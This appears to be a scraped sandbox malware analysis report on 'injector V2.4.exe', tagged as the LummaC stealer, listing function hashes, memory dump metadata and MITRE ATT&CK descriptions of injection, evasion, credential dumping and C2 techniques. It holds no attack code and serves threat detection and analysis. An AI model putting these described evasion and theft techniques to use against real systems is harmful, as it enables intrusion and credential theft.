Opcode ID: fbebd50d2877825441b0283b096e8df1a0b339b54f1c7536cc168f26ec9a7bf5
Instruction ID: f5f0e4abd8f2197cd50e3826bca16fc8f654f80e4a3ec16201971593374c54b9
Opcode Fuzzy Hash: fbebd50d2877825441b0283b096e8df1a0b339b54f1c7536cc168f26ec9a7bf5
Instruction Fuzzy Hash: 4C317D71A442006BF714DF25DC81B3BB269EFC5348F04983EF98A93252E235DC15825B

Function 0042F39A Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b930b8f1d1c79882646380d608656a487a45ef369a009ece13ef3fd6dead8c0
Instruction ID: 3f89de71dcd256d75a6e9f3add646b54f05b37f40cc2575bcc216b7eb0beb8b8
Opcode Fuzzy Hash: 6b930b8f1d1c79882646380d608656a487a45ef369a009ece13ef3fd6dead8c0
Instruction Fuzzy Hash: 153106606057918BE7268F3594607B3BBE59F33304F9824BEC0D7E7383D6B9A50A8719

Function 0041E8A1 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f98cfab76652dd9705530a0b4d44f54676ed4c850c7203bb028c1cbab53d01
Instruction ID: 2300e1b2cabd148c2755dea064deaf0a9ef10d0df6b83e55c4b1d5862a3f4173
Opcode Fuzzy Hash: e4f98cfab76652dd9705530a0b4d44f54676ed4c850c7203bb028c1cbab53d01
Instruction Fuzzy Hash: DB3168B69283108AD710CF16C88126BBAB2FFD1318F099D4DE4C12B345EB79D501CB86

Function 0041DB1F Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08eaf5dab14eefdacf2d5299b26ba817f16b82547a31f996ba2a47f64421abe
Instruction ID: 73be866d36d2c69ece61f5aa691b8487a64f63c0c172fe79b4cb7161451752ec
Opcode Fuzzy Hash: b08eaf5dab14eefdacf2d5299b26ba817f16b82547a31f996ba2a47f64421abe
Instruction Fuzzy Hash: D221BEB065C3405BD7148F35C8A176BBBE1AB8A318F188A6DE0D6973D1D379C5498B09

Function 004367A0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: df218fecf1d2d99cc99cac15c08ecd2c1274b3ea3335ebc6b0616032a60435af
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: F9112933A051D10FC3168D3C8400565BFA30A9B238F5AD39AF4B49B2D6D6278D8A8359

Function 0042C410 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501327ee5778e54276eceebaa8889c239e5c5c003c7d7c24a23ce77e23ed22a6
Instruction ID: 4489895cca936e4abe409225e898e03886df2ad83094abc39497c55c0caecd12
Opcode Fuzzy Hash: 501327ee5778e54276eceebaa8889c239e5c5c003c7d7c24a23ce77e23ed22a6
Instruction Fuzzy Hash: A5019EF1B00B2157D620AE15A4D173BB2A96B91708F58493EE84867342DB7AEC1486EA

Function 0040A35B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701ab4b16e5d8c3835dc58eab3428ea4a2eb49a2cfb8e48d68bf144173fa0bf6
Instruction ID: 502b15905b95d2415722392238a37ea4478960f04c60f78b64d407422a97dbc3
Opcode Fuzzy Hash: 701ab4b16e5d8c3835dc58eab3428ea4a2eb49a2cfb8e48d68bf144173fa0bf6
Instruction Fuzzy Hash: 24212FB8411B959FD330DF22E590657BBF0BB02B18B018E0EC8C22BB04E738A441CF84

Function 0042D9F4 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1702256058ba8ae1f135b08a0c1aff2490d3d93f5ef519058005c57e8c80f43a
Instruction ID: 685ab43d0681d246d38c373255c2debea23af3536c657c9476a487a5431206a9
Opcode Fuzzy Hash: 1702256058ba8ae1f135b08a0c1aff2490d3d93f5ef519058005c57e8c80f43a
Instruction Fuzzy Hash: 3A01F73AB582424FD305CFA9F8911B67363A7D731036D606AC186A7717D9B0AD1B8748

Function 0040A130 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6263a111e4431cf229a4f9c988475e808a76b337e934fa65a45ff73b139d9f5
Instruction ID: feacb86999ce9ff7795c3953c93015704ce3b6e090d15c77f2584a537cf6127b
Opcode Fuzzy Hash: c6263a111e4431cf229a4f9c988475e808a76b337e934fa65a45ff73b139d9f5
Instruction Fuzzy Hash: 54D012686052586F5618DB599C56D337A7DC643344B007028B942E3391C900AC10C5AF

Function 0041D834 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550c360841e3f47cc10e6d05a462e5641be7cb35a74dbf4335e2cbc0cf2be45a
Instruction ID: fb63768699409a5dfa46efd542a61eda3e4a625d5d8ff59f84200bfc470c8de5
Opcode Fuzzy Hash: 550c360841e3f47cc10e6d05a462e5641be7cb35a74dbf4335e2cbc0cf2be45a
Instruction Fuzzy Hash: 5CE08C7690C2C18BC3009F2D9C800AABA722EDB108B3A86A298D883367C938C5098749

Function 0041A643 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f65cf7adf809ca86fd35004999eeba456f81f404232e7dbb88cebb7e75223d
Instruction ID: a8b9983a00085ea965ea068030661833ffe602a2ce69df8dac9738155861896d
Opcode Fuzzy Hash: 52f65cf7adf809ca86fd35004999eeba456f81f404232e7dbb88cebb7e75223d
Instruction Fuzzy Hash: 53B092BAC04800A6D0112F113E4683EB036055360CF0524BEE84632242AB2BD21A506F

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report injector V2.4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
injector V2.4.exe

Function 00B5D18D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00B2D475 Relevance: 1.5, Strings: 1, Instructions: 206
COMMON

Function 00B50E88 Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 00B4D4CA Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00B4D2B2 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00B2A0B0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Function 00B4C7CC Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00B4DC4B Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 00B4DA59 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Function 00B2B0E4 Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Function 00B4EB9B Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre